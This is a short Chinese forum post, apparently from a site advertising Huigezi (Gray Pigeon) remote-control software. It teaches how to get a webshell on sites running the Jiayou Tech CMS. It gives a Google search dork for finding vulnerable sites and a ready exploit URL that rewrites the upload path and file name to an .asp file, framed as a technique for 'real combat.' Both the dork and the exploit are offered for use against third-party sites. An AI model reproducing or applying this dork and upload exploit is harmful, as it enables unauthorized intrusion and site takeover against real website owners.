灰鸽子远程控制软件

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 15589|回复: 0

修改url的参数进行突破上传限制拿webshell 灰鸽子下载www.huigezi.org

[复制链接]
发表于 2013-2-3 14:12:16 | 显示全部楼层 |阅读模式
修改url的参数进行突破上传限制拿webshell 灰鸽子下载


大家可能都看见过这样的漏洞,这里以疯子的嘉友科技cms上传漏洞为例。

谷歌关键字:inurl:newslist.asp?NodeCode=   灰鸽子使用教程灰鸽子下载exp:
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出对参数PicPath进行了修改,
这种漏洞主要是存在文件名或者路径过滤不严,在实战中多多观察url中的参数,可以尝试进行修改数据。

评帖赚银币(0) 收起
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|灰鸽子远程控制软件|灰鸽子远程控制软件 ( 鲁ICP备14000061号-4 )

GMT+8, 2024-11-22 05:30 , Processed in 0.091566 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表